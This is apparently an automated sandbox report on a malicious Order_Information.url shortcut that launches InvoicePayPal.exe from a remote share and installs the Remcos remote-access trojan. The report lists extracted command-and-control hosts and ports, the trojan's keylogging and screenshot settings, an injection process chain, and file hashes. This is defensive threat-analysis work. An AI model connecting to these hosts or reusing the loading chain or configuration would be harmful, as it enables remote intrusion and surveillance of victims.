Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20231023-en -
resource tags
arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2023 11:56
Static task
static1
Behavioral task
behavioral1
Sample
Order_Information.url
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
Order_Information.url
Resource
win10v2004-20231023-en
General
-
Target
Order_Information.url
-
Size
201B
-
MD5
73461871b344c75f77323047fbafd617
-
SHA1
2a7860291499b27b133fe538f792173d7fc93de2
-
SHA256
dbd04333b7af300fbe8f6843866881403b48711d6380102109dabfdad6ad0251
-
SHA512
275bc9b94ebb8797c08a75bd4f0cebd7d8bf143d73d649df612fb4c2eeae9b6ea764f4871da9fa097f0b3e74d706e4c3e8b2e80ecaf94cdfefc6f0d9be8ea2cc
Malware Config
Extracted
remcos
RemoteHost
listpoints.online:6090
retghrtgwtrgtg.bounceme.net:3839
listpoints.click:7020
datastream.myvnc.com:5225
gservicese.com:2718
center.onthewifi.com:8118
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
explorer.exe
-
delete_file
false
-
hide_file
true
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-BXAQVH
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
InvoicePayPal.exedescription pid process target process PID 1564 created 376 1564 InvoicePayPal.exe rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
rundll32.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation rundll32.exe -
Executes dropped EXE 1 IoCs
Processes:
WebCopier.exepid process 3316 WebCopier.exe -
Loads dropped DLL 1 IoCs
Processes:
WebCopier.exepid process 3316 WebCopier.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
WebCopier.exedescription pid process target process PID 3316 set thread context of 404 3316 WebCopier.exe cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
InvoicePayPal.exeWebCopier.execmd.exepid process 1564 InvoicePayPal.exe 1564 InvoicePayPal.exe 3316 WebCopier.exe 3316 WebCopier.exe 404 cmd.exe 404 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
WebCopier.execmd.exepid process 3316 WebCopier.exe 404 cmd.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
InvoicePayPal.exepid process 1564 InvoicePayPal.exe 1564 InvoicePayPal.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
rundll32.exeInvoicePayPal.exeWebCopier.execmd.exedescription pid process target process PID 376 wrote to memory of 1564 376 rundll32.exe InvoicePayPal.exe PID 376 wrote to memory of 1564 376 rundll32.exe InvoicePayPal.exe PID 376 wrote to memory of 1564 376 rundll32.exe InvoicePayPal.exe PID 1564 wrote to memory of 3316 1564 InvoicePayPal.exe WebCopier.exe PID 1564 wrote to memory of 3316 1564 InvoicePayPal.exe WebCopier.exe PID 1564 wrote to memory of 3316 1564 InvoicePayPal.exe WebCopier.exe PID 3316 wrote to memory of 404 3316 WebCopier.exe cmd.exe PID 3316 wrote to memory of 404 3316 WebCopier.exe cmd.exe PID 3316 wrote to memory of 404 3316 WebCopier.exe cmd.exe PID 3316 wrote to memory of 404 3316 WebCopier.exe cmd.exe PID 404 wrote to memory of 2248 404 cmd.exe explorer.exe PID 404 wrote to memory of 2248 404 cmd.exe explorer.exe PID 404 wrote to memory of 2248 404 cmd.exe explorer.exe PID 404 wrote to memory of 2248 404 cmd.exe explorer.exe
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Order_Information.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
\??\UNC\62.173.141.114\scarica\InvoicePayPal.exe"\\62.173.141.114\scarica\InvoicePayPal.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\javahost_v5\WebCopier.exeC:\Users\Admin\AppData\Roaming\javahost_v5\WebCopier.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe4⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\1d3e527aFilesize
1.1MB
MD55f7b6e3acb1c144109ae7b2148a6b344
SHA12e14fc41a868bef4c59294ef6dfc01c8341bb269
SHA25610cd679f0adcc3103979dcf7e036589fc174ca832cd5d8967b06b832c7aec671
SHA51227615c81e9c8270d4701599004b0bcad57007a199db5d4e9ce41e5f4f92164e8c81c4c8ba412e9c2091a1c4bfd94664b9cf72a4e47cf95e98fdcd90af949efa7
-
C:\Users\Admin\AppData\Roaming\javahost_v5\WCUtil.dllFilesize
180KB
MD5fc081646850c1abf5d78706a6de6d639
SHA147bbf2399cb6cca6f129443fdd2b12265e3912ec
SHA25605f89f7a7c06db98e3e2c89ca63d0d88f89bb4c18bcc5032ed63d1e2c1619fdb
SHA512a79dbd417715fad354647aa667935b13e55130edfbce6a957682889a4142acd79abc835a7d1cd0f6671f83b47f007af54ee601d4431d6f64cfbef5b4363402fa
-
C:\Users\Admin\AppData\Roaming\javahost_v5\WCUtil.dllFilesize
180KB
MD5fc081646850c1abf5d78706a6de6d639
SHA147bbf2399cb6cca6f129443fdd2b12265e3912ec
SHA25605f89f7a7c06db98e3e2c89ca63d0d88f89bb4c18bcc5032ed63d1e2c1619fdb
SHA512a79dbd417715fad354647aa667935b13e55130edfbce6a957682889a4142acd79abc835a7d1cd0f6671f83b47f007af54ee601d4431d6f64cfbef5b4363402fa
-
C:\Users\Admin\AppData\Roaming\javahost_v5\WebCopier.exeFilesize
7.2MB
MD5e2a27870ba4da90df6276c4da9e3cf82
SHA1cd0a17f6ddc7b4994d98f26848c3a2d7dae74e68
SHA2569f1bb79ef7d76e5dddc628d0455c1f6a6aa068cc210f1d238a231f77ac9cbba2
SHA51266c4d8d1c6cb45a6c10cbb16d4388858980e7bc4f57fb88dc2a3b7b8fc6da82dba3e9b1bfd33ea4c25a7afd5612c2823915e5f0759728cccfe81bd4f99afc235
-
C:\Users\Admin\AppData\Roaming\javahost_v5\WebCopier.exeFilesize
7.2MB
MD5e2a27870ba4da90df6276c4da9e3cf82
SHA1cd0a17f6ddc7b4994d98f26848c3a2d7dae74e68
SHA2569f1bb79ef7d76e5dddc628d0455c1f6a6aa068cc210f1d238a231f77ac9cbba2
SHA51266c4d8d1c6cb45a6c10cbb16d4388858980e7bc4f57fb88dc2a3b7b8fc6da82dba3e9b1bfd33ea4c25a7afd5612c2823915e5f0759728cccfe81bd4f99afc235
-
C:\Users\Admin\AppData\Roaming\javahost_v5\paralanguage.xlsxFilesize
925KB
MD54441c3a6efda6fe8a91638fab65b7592
SHA171fbdb1b42863a79acf37290d193053c67f8de9c
SHA256798a990b2b9b7372072f2976884eebbf269aa30921643a87772d9d38fff1a39e
SHA512ec7d675e0854abdf10a2df09d0425959da471fd382798152945f25fb31193fb3a4481bd2f26cea4de327c8e9d725152767eaef4d8fe1d23cde1fe0dc36de54cc
-
memory/404-24-0x00007FFF610B0000-0x00007FFF612A5000-memory.dmpFilesize
2.0MB
-
memory/404-26-0x0000000074640000-0x00000000747BB000-memory.dmpFilesize
1.5MB
-
memory/404-29-0x0000000074640000-0x00000000747BB000-memory.dmpFilesize
1.5MB
-
memory/404-27-0x0000000074640000-0x00000000747BB000-memory.dmpFilesize
1.5MB
-
memory/404-22-0x0000000074640000-0x00000000747BB000-memory.dmpFilesize
1.5MB
-
memory/1564-1-0x0000000074640000-0x00000000747BB000-memory.dmpFilesize
1.5MB
-
memory/1564-2-0x00007FFF610B0000-0x00007FFF612A5000-memory.dmpFilesize
2.0MB
-
memory/1564-0-0x0000000000400000-0x0000000000C1A000-memory.dmpFilesize
8.1MB
-
memory/1564-4-0x0000000074640000-0x00000000747BB000-memory.dmpFilesize
1.5MB
-
memory/1564-19-0x0000000074640000-0x00000000747BB000-memory.dmpFilesize
1.5MB
-
memory/1564-9-0x0000000074640000-0x00000000747BB000-memory.dmpFilesize
1.5MB
-
memory/2248-35-0x0000000000470000-0x00000000004F4000-memory.dmpFilesize
528KB
-
memory/2248-38-0x0000000000470000-0x00000000004F4000-memory.dmpFilesize
528KB
-
memory/2248-42-0x0000000000470000-0x00000000004F4000-memory.dmpFilesize
528KB
-
memory/2248-41-0x0000000000470000-0x00000000004F4000-memory.dmpFilesize
528KB
-
memory/2248-30-0x00007FFF610B0000-0x00007FFF612A5000-memory.dmpFilesize
2.0MB
-
memory/2248-31-0x0000000000470000-0x00000000004F4000-memory.dmpFilesize
528KB
-
memory/2248-34-0x0000000000BB0000-0x0000000000FE3000-memory.dmpFilesize
4.2MB
-
memory/2248-40-0x0000000000470000-0x00000000004F4000-memory.dmpFilesize
528KB
-
memory/2248-36-0x0000000000470000-0x00000000004F4000-memory.dmpFilesize
528KB
-
memory/2248-37-0x0000000000470000-0x00000000004F4000-memory.dmpFilesize
528KB
-
memory/2248-43-0x0000000000470000-0x00000000004F4000-memory.dmpFilesize
528KB
-
memory/2248-39-0x0000000000470000-0x00000000004F4000-memory.dmpFilesize
528KB
-
memory/3316-17-0x00007FFF610B0000-0x00007FFF612A5000-memory.dmpFilesize
2.0MB
-
memory/3316-18-0x0000000074640000-0x00000000747BB000-memory.dmpFilesize
1.5MB
-
memory/3316-20-0x0000000074640000-0x00000000747BB000-memory.dmpFilesize
1.5MB
-
memory/3316-16-0x0000000074640000-0x00000000747BB000-memory.dmpFilesize
1.5MB